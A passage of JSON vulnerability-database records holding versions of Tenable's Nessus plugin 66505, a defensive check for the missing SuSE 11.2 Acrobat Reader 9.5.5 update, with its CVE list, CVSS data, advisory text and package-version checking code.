script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2013-2723.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2013-2724.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2013-2725.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2013-2726.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2013-2727.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2013-2729.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2013-2730.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2013-2731.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2013-2732.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2013-2733.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2013-2734.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2013-2735.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2013-2736.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2013-2737.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2013-3337.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2013-3338.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2013-3339.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2013-3340.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2013-3341.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2013-3342.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Apply SAT patch number 7734.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'AdobeCollabSync Buffer Overflow Adobe Reader X Sandbox Bypass');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:acroread\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:acroread-cmaps\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:acroread-fonts-ja\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:acroread-fonts-ko\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:acroread-fonts-zh_CN\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:acroread-fonts-zh_TW\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:11\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/05/16\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/05/19\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2014 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)11\") audit(AUDIT_OS_NOT, \"SuSE 11\");\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SuSE 11\", cpu);\n\npl = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(pl) || int(pl) != 2) audit(AUDIT_OS_NOT, \"SuSE 11.2\");\n\n\nflag = 0;\nif (rpm_check(release:\"SLED11\", sp:2, cpu:\"i586\", reference:\"acroread-9.5.5-0.3.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:2, cpu:\"i586\", reference:\"acroread-cmaps-9.4.6-0.4.3.2\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:2, cpu:\"i586\", reference:\"acroread-fonts-ja-9.4.6-0.4.3.2\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:2, cpu:\"i586\", reference:\"acroread-fonts-ko-9.4.6-0.4.3.2\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:2, cpu:\"i586\", reference:\"acroread-fonts-zh_CN-9.4.6-0.4.3.2\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:2, cpu:\"i586\", reference:\"acroread-fonts-zh_TW-9.4.6-0.4.3.2\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:2, cpu:\"x86_64\", reference:\"\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:2, cpu:\"x86_64\", reference:\"acroread-cmaps-9.4.6-0.4.3.2\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:2, cpu:\"x86_64\", reference:\"acroread-fonts-ja-9.4.6-0.4.3.2\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:2, cpu:\"x86_64\", reference:\"acroread-fonts-ko-9.4.6-0.4.3.2\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:2, cpu:\"x86_64\", reference:\"acroread-fonts-zh_CN-9.4.6-0.4.3.2\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:2, cpu:\"x86_64\", reference:\"acroread-fonts-zh_TW-9.4.6-0.4.3.2\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "title": "SuSE 11.2 Security Update : Acrobat Reader (SAT Patch Number 7734)", "type": "nessus", "viewCount": 4}, "differentElements": ["description"], "edition": 5, "lastseen": "2019-01-16T20:16:07"}, {"bulletin": {"bulletinFamily": "scanner", "cpe": [], "cvelist": ["CVE-2013-2718", "CVE-2013-2733", "CVE-2013-2724", "CVE-2013-2731", "CVE-2013-2725", "CVE-2013-2721", "CVE-2013-2723", "CVE-2013-2722", "CVE-2013-2720", "CVE-2013-2550", "CVE-2013-3339", "CVE-2013-2737", "CVE-2013-2734", "CVE-2013-2719", "CVE-2013-2735", "CVE-2013-2736", "CVE-2013-3341", "CVE-2013-2726", "CVE-2013-2729", "CVE-2013-2727", "CVE-2013-3337", "CVE-2013-3342", "CVE-2013-2732", "CVE-2013-2730", "CVE-2013-2549", "CVE-2013-3338", "CVE-2013-3340"], "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "description": "Acrobat Reader has been updated to version 9.5.5.\n\nThe Adobe Advisory can be found at:\nhttps://www.adobe.com/support/security/bulletins/apsb13-15.html\n\nThese updates resolve :\n\n - memory corruption vulnerabilities that could lead to code execution. (CVE-2013-2718 / CVE-2013-2719 / CVE-2013-2720 / CVE-2013-2721 / CVE-2013-2722 / CVE-2013-2723 / CVE-2013-2725 / CVE-2013-2726 / CVE-2013-2731 / CVE-2013-2732 / CVE-2013-2734 / CVE-2013-2735 / CVE-2013-2736 / CVE-2013-3337 / CVE-2013-3338 / CVE-2013-3339 / CVE-2013-3340 / CVE-2013-3341)\n\n - an integer underflow vulnerability that could lead to code execution. (CVE-2013-2549)\n\n - a use-after-free vulnerability that could lead to a bypass of Adobe Reader's sandbox protection.\n (CVE-2013-2550)\n\n - an information leakage issue involving a JavaScript API.\n (CVE-2013-2737)\n\n - a stack overflow vulnerability that could lead to code execution. (CVE-2013-2724)\n\n - buffer overflow vulnerabilities that could lead to code execution. (CVE-2013-2730 / CVE-2013-2733)\n\n - integer overflow vulnerabilities that could lead to code execution. (CVE-2013-2727 / CVE-2013-2729)\n\n - a flaw in the way Reader handles domains that have been blacklisted in the operating system. (CVE-2013-3342)", "edition": 1, "enchantments": {}, "hash": "09222124806c480305f531941583df523b519f26c0cc002d00cebb6352716b18", "hashmap": [{"hash": "b7d964d31ceb19828376c6b29f67ab4f", "key": "href"}, {"hash": "9cf00d658b687f030ebe173a0528c567", "key": "reporter"}, {"hash": "3915c269beae984e656e15c5cff71b31", "key": "description"}, {"hash": "9b1fd3436c4d001d02a057ece18c32db", "key": "title"}, {"hash": "2bdabeb49c44761f9565717ab0e38165", "key": "cvss"}, {"hash": "dd906d3e06e3de29c2a35454a1d6e8a1", "key": "cvelist"}, {"hash": "6b01ab9924b51f2f50795114abfd2971", "key": "references"}, {"hash": "144314e655908bceed52c4a5fb4a5710", "key": "sourceData"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "20176f54edbcd7032dfea78d1cf309a1", "key": "modified"}, {"hash": "5e0bd03bec244039678f2b955a2595aa", "key": "type"}, {"hash": "71a40666da62ba38d22539c8277870c7", "key": "naslFamily"}, {"hash": "9a62ae0ed697cbadc7e7a18563be61a7", "key": "published"}, {"hash": "ab6cddd653e5a262cf9792179aafae7f", "key": "pluginID"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe"}], "history": [], "href": "https://www.tenable.com/plugins/index.php?view=single&id=66505", "id": "SUSE_11_ACROREAD-130516.NASL", "lastseen": "2016-09-26T17:23:27", "modified": "2014-06-27T00:00:00", "naslFamily": "SuSE Local Security Checks", "objectVersion": "1.2", "pluginID": "66505", "published": "2013-05-19T00:00:00", "references": ["http://support.novell.com/security/cve/CVE-2013-2726.html", "http://support.novell.com/security/cve/CVE-2013-2731.html", "http://support.novell.com/security/cve/CVE-2013-2722.html", "http://support.novell.com/security/cve/CVE-2013-2732.html", "http://support.novell.com/security/cve/CVE-2013-2736.html", "http://support.novell.com/security/cve/CVE-2013-2718.html", "http://support.novell.com/security/cve/CVE-2013-2719.html", "http://support.novell.com/security/cve/CVE-2013-2723.html", "http://support.novell.com/security/cve/CVE-2013-2550.html", "http://support.novell.com/security/cve/CVE-2013-3337.html", "http://support.novell.com/security/cve/CVE-2013-2734.html", "http://support.novell.com/security/cve/CVE-2013-2729.html", "http://support.novell.com/security/cve/CVE-2013-3338.html", "http://support.novell.com/security/cve/CVE-2013-2724.html", "http://support.novell.com/security/cve/CVE-2013-2737.html", "http://support.novell.com/security/cve/CVE-2013-2727.html", "http://support.novell.com/security/cve/CVE-2013-3340.html", "http://support.novell.com/security/cve/CVE-2013-3339.html", "https://bugzilla.novell.com/show_bug.cgi?id=819918", "http://support.novell.com/security/cve/CVE-2013-2730.html", "http://support.novell.com/security/cve/CVE-2013-2720.html", "http://support.novell.com/security/cve/CVE-2013-3341.html", "http://support.novell.com/security/cve/CVE-2013-3342.html", "http://support.novell.com/security/cve/CVE-2013-2549.html", "http://support.novell.com/security/cve/CVE-2013-2735.html", "http://support.novell.com/security/cve/CVE-2013-2733.html", "http://support.novell.com/security/cve/CVE-2013-2721.html", "http://support.novell.com/security/cve/CVE-2013-2725.html"], "reporter": "Tenable", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from SuSE 11 update information. The text itself is\n# copyright (C) Novell, Inc.\n#\n\nif (NASL_LEVEL < 3000) exit(0);\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(66505);\n script_version(\"$Revision: 1.9 $\");\n script_cvs_date(\"$Date: 2014/06/27 10:42:17 $\");\n\n script_cve_id(\"CVE-2013-2549\", \"CVE-2013-2550\", \"CVE-2013-2718\", \"CVE-2013-2719\", \"CVE-2013-2720\", \"CVE-2013-2721\", \"CVE-2013-2722\", \"CVE-2013-2723\", \"CVE-2013-2724\", \"CVE-2013-2725\", \"CVE-2013-2726\", \"CVE-2013-2727\", \"CVE-2013-2729\", \"CVE-2013-2730\", \"CVE-2013-2731\", \"CVE-2013-2732\", \"CVE-2013-2733\", \"CVE-2013-2734\", \"CVE-2013-2735\", \"CVE-2013-2736\", \"CVE-2013-2737\", \"CVE-2013-3337\", \"CVE-2013-3338\", \"CVE-2013-3339\", \"CVE-2013-3340\", \"CVE-2013-3341\", \"CVE-2013-3342\");\n\n script_name(english:\"SuSE 11.2 Security Update : Acrobat Reader (SAT Patch Number 7734)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SuSE 11 host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Acrobat Reader has been updated to version 9.5.5.\n\nThe Adobe Advisory can be found at:\nhttps://www.adobe.com/support/security/bulletins/apsb13-15.html\n\nThese updates resolve :\n\n - memory corruption vulnerabilities that could lead to\n code execution. (CVE-2013-2718 / CVE-2013-2719 /\n CVE-2013-2720 / CVE-2013-2721 / CVE-2013-2722 /\n CVE-2013-2723 / CVE-2013-2725 / CVE-2013-2726 /\n CVE-2013-2731 / CVE-2013-2732 / CVE-2013-2734 /\n CVE-2013-2735 / CVE-2013-2736 / CVE-2013-3337 /\n CVE-2013-3338 / CVE-2013-3339 / CVE-2013-3340 /\n CVE-2013-3341)\n\n - an integer underflow vulnerability that could lead to\n code execution. (CVE-2013-2549)\n\n - a use-after-free vulnerability that could lead to a\n bypass of Adobe Reader's sandbox protection.\n (CVE-2013-2550)\n\n - an information leakage issue involving a JavaScript API.\n (CVE-2013-2737)\n\n - a stack overflow vulnerability that could lead to code\n execution. (CVE-2013-2724)\n\n - buffer overflow vulnerabilities that could lead to code\n execution. (CVE-2013-2730 / CVE-2013-2733)\n\n - integer overflow vulnerabilities that could lead to code\n execution. (CVE-2013-2727 / CVE-2013-2729)\n\n - a flaw in the way Reader handles domains that have been\n blacklisted in the operating system. (CVE-2013-3342)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=819918\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2013-2549.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2013-2550.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2013-2718.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2013-2719.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2013-2720.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2013-2721.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2013-2722.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2013-2723.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2013-2724.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2013-2725.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2013-2726.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2013-2727.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2013-2729.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2013-2730.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2013-2731.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2013-2732.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2013-2733.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2013-2734.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2013-2735.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2013-2736.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2013-2737.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2013-3337.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2013-3338.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2013-3339.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2013-3340.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2013-3341.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2013-3342.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Apply SAT patch number 7734.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'AdobeCollabSync Buffer Overflow Adobe Reader X Sandbox Bypass');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:acroread\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:acroread-cmaps\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:acroread-fonts-ja\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:acroread-fonts-ko\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:acroread-fonts-zh_CN\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:acroread-fonts-zh_TW\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:11\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/05/16\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/05/19\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2014 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)11\") audit(AUDIT_OS_NOT, \"SuSE 11\");\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SuSE 11\", cpu);\n\npl = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(pl) || int(pl) != 2) audit(AUDIT_OS_NOT, \"SuSE 11.2\");\n\n\nflag = 0;\nif (rpm_check(release:\"SLED11\", sp:2, cpu:\"i586\", reference:\"acroread-9.5.5-0.3.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:2, cpu:\"i586\", reference:\"acroread-cmaps-9.4.6-0.4.3.2\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:2, cpu:\"i586\", reference:\"acroread-fonts-ja-9.4.6-0.4.3.2\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:2, cpu:\"i586\", reference:\"acroread-fonts-ko-9.4.6-0.4.3.2\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:2, cpu:\"i586\", reference:\"acroread-fonts-zh_CN-9.4.6-0.4.3.2\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:2, cpu:\"i586\", reference:\"acroread-fonts-zh_TW-9.4.6-0.4.3.2\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:2, cpu:\"x86_64\", reference:\"\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:2, cpu:\"x86_64\", reference:\"acroread-cmaps-9.4.6-0.4.3.2\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:2, cpu:\"x86_64\", reference:\"acroread-fonts-ja-9.4.6-0.4.3.2\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:2, cpu:\"x86_64\", reference:\"acroread-fonts-ko-9.4.6-0.4.3.2\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:2, cpu:\"x86_64\", reference:\"acroread-fonts-zh_CN-9.4.6-0.4.3.2\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:2, cpu:\"x86_64\", reference:\"acroread-fonts-zh_TW-9.4.6-0.4.3.2\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "title": "SuSE 11.2 Security Update : Acrobat Reader (SAT Patch Number 7734)", "type": "nessus", "viewCount": 2}, "differentElements": ["cpe"], "edition": 1, "lastseen": "2016-09-26T17:23:27"}, {"bulletin": {"bulletinFamily": "scanner", "cpe": ["p-cpe:/a:novell:suse_linux:11:acroread-fonts-ja", "p-cpe:/a:novell:suse_linux:11:acroread-fonts-zh_CN", "cpe:/o:novell:suse_linux:11", "p-cpe:/a:novell:suse_linux:11:acroread-fonts-ko", "p-cpe:/a:novell:suse_linux:11:acroread-cmaps", "p-cpe:/a:novell:suse_linux:11:acroread", "p-cpe:/a:novell:suse_linux:11:acroread-fonts-zh_TW"], "cvelist": ["CVE-2013-2718", "CVE-2013-2733", "CVE-2013-2724", "CVE-2013-2731", "CVE-2013-2725", "CVE-2013-2721", "CVE-2013-2723", "CVE-2013-2722", "CVE-2013-2720", "CVE-2013-2550", "CVE-2013-3339", "CVE-2013-2737", "CVE-2013-2734", "CVE-2013-2719", "CVE-2013-2735", "CVE-2013-2736", "CVE-2013-3341", "CVE-2013-2726", "CVE-2013-2729", "CVE-2013-2727", "CVE-2013-3337", "CVE-2013-3342", "CVE-2013-2732", "CVE-2013-2730", "CVE-2013-2549", "CVE-2013-3338", "CVE-2013-3340"], "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "description": "Acrobat Reader has been updated to version 9.5.5.\n\nThe Adobe Advisory can be found at:\nhttps://www.adobe.com/support/security/bulletins/apsb13-15.html\n\nThese updates resolve :\n\n - memory corruption vulnerabilities that could lead to code execution. (CVE-2013-2718 / CVE-2013-2719 / CVE-2013-2720 / CVE-2013-2721 / CVE-2013-2722 / CVE-2013-2723 / CVE-2013-2725 / CVE-2013-2726 / CVE-2013-2731 / CVE-2013-2732 / CVE-2013-2734 / CVE-2013-2735 / CVE-2013-2736 / CVE-2013-3337 / CVE-2013-3338 / CVE-2013-3339 / CVE-2013-3340 / CVE-2013-3341)\n\n - an integer underflow vulnerability that could lead to code execution. (CVE-2013-2549)\n\n - a use-after-free vulnerability that could lead to a bypass of Adobe Reader's sandbox protection.\n (CVE-2013-2550)\n\n - an information leakage issue involving a JavaScript API.\n (CVE-2013-2737)\n\n - a stack overflow vulnerability that could lead to code execution. (CVE-2013-2724)\n\n - buffer overflow vulnerabilities that could lead to code execution. (CVE-2013-2730 / CVE-2013-2733)\n\n - integer overflow vulnerabilities that could lead to code execution. (CVE-2013-2727 / CVE-2013-2729)\n\n - a flaw in the way Reader handles domains that have been blacklisted in the operating system. (CVE-2013-3342)", "edition": 4, "enchantments": {"score": {"value": 7.5, "vector": "NONE"}}, "hash": "27f648398389c15a47b1df434de6e82701da9ab9c3209abb9cd2a94c1e585d63", "hashmap": [{"hash": "b7d964d31ceb19828376c6b29f67ab4f", "key": "href"}, {"hash": "9cf00d658b687f030ebe173a0528c567", "key": "reporter"}, {"hash": "3915c269beae984e656e15c5cff71b31", "key": "description"}, {"hash": "9b1fd3436c4d001d02a057ece18c32db", "key": "title"}, {"hash": "2bdabeb49c44761f9565717ab0e38165", "key": "cvss"}, {"hash": "dd906d3e06e3de29c2a35454a1d6e8a1", "key": "cvelist"}, {"hash": "6b01ab9924b51f2f50795114abfd2971", "key": "references"}, {"hash": "144314e655908bceed52c4a5fb4a5710", "key": "sourceData"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "20176f54edbcd7032dfea78d1cf309a1", "key": "modified"}, {"hash": "5e0bd03bec244039678f2b955a2595aa", "key": "type"}, {"hash": "c2716a5d83da1721f23778e107a0d6a0", "key": "cpe"}, {"hash": "71a40666da62ba38d22539c8277870c7", "key": "naslFamily"}, {"hash": "9a62ae0ed697cbadc7e7a18563be61a7", "key": "published"}, {"hash": "ab6cddd653e5a262cf9792179aafae7f", "key": "pluginID"}], "history": [], "href": "https://www.tenable.com/plugins/index.php?view=single&id=66505", "id": "SUSE_11_ACROREAD-130516.NASL", "lastseen": "2018-09-01T23:34:56", "modified": "2014-06-27T00:00:00", "naslFamily": "SuSE Local Security Checks", "objectVersion": "1.3", "pluginID": "66505", "published": "2013-05-19T00:00:00", "references": ["http://support.novell.com/security/cve/CVE-2013-2726.html", "http://support.novell.com/security/cve/CVE-2013-2731.html", "http://support.novell.com/security/cve/CVE-2013-2722.html", "http://support.novell.com/security/cve/CVE-2013-2732.html", "http://support.novell.com/security/cve/CVE-2013-2736.html", "http://support.novell.com/security/cve/CVE-2013-2718.html", "http://support.novell.com/security/cve/CVE-2013-2719.html", "http://support.novell.com/security/cve/CVE-2013-2723.html", "http://support.novell.com/security/cve/CVE-2013-2550.html", "http://support.novell.com/security/cve/CVE-2013-3337.html", "http://support.novell.com/security/cve/CVE-2013-2734.html", "http://support.novell.com/security/cve/CVE-2013-2729.html", "http://support.novell.com/security/cve/CVE-2013-3338.html", "http://support.novell.com/security/cve/CVE-2013-2724.html", "http://support.novell.com/security/cve/CVE-2013-2737.html", "http://support.novell.com/security/cve/CVE-2013-2727.html", "http://support.novell.com/security/cve/CVE-2013-3340.html", "http://support.novell.com/security/cve/CVE-2013-3339.html", "https://bugzilla.novell.com/show_bug.cgi?id=819918", "http://support.novell.com/security/cve/CVE-2013-2730.html", "http://support.novell.com/security/cve/CVE-2013-2720.html", "http://support.novell.com/security/cve/CVE-2013-3341.html", "http://support.novell.com/security/cve/CVE-2013-3342.html", "http://support.novell.com/security/cve/CVE-2013-2549.html", "http://support.novell.com/security/cve/CVE-2013-2735.html", "http://support.novell.com/security/cve/CVE-2013-2733.html", "http://support.novell.com/security/cve/CVE-2013-2721.html", "http://support.novell.com/security/cve/CVE-2013-2725.html"], "reporter": "Tenable", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from SuSE 11 update information. The text itself is\n# copyright (C) Novell, Inc.\n#\n\nif (NASL_LEVEL < 3000) exit(0);\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(66505);\n script_version(\"$Revision: 1.9 $\");\n script_cvs_date(\"$Date: 2014/06/27 10:42:17 $\");\n\n script_cve_id(\"CVE-2013-2549\", \"CVE-2013-2550\", \"CVE-2013-2718\", \"CVE-2013-2719\", \"CVE-2013-2720\", \"CVE-2013-2721\", \"CVE-2013-2722\", 